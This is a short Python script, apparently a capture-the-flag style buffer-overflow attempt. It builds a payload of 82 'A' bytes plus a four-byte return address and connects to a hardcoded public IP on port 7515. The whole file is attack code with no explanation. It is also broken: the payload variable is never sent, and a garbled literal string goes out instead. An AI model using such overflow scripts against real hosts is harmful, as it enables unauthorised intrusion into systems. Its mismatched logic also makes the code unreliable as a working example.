#!/usr/bin/python
import socket
                                                                                            
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)                                       
                                                                                            
buffer="A"*82 + "\x49\x4C\x59\x70"
                                                                                            
try:
        s.connect(('52.61.142.146',7515))
        data = s.recv(4096)
        print(data)
        s.sendall('buffefFfffffffffffr')
        data2 = s.recv(8192)
        print(data2)
        s.close()                                                                           
except:
        print("Didn't work")
~                                                                                           
~                                                                                           
~                                                                                           
~                               
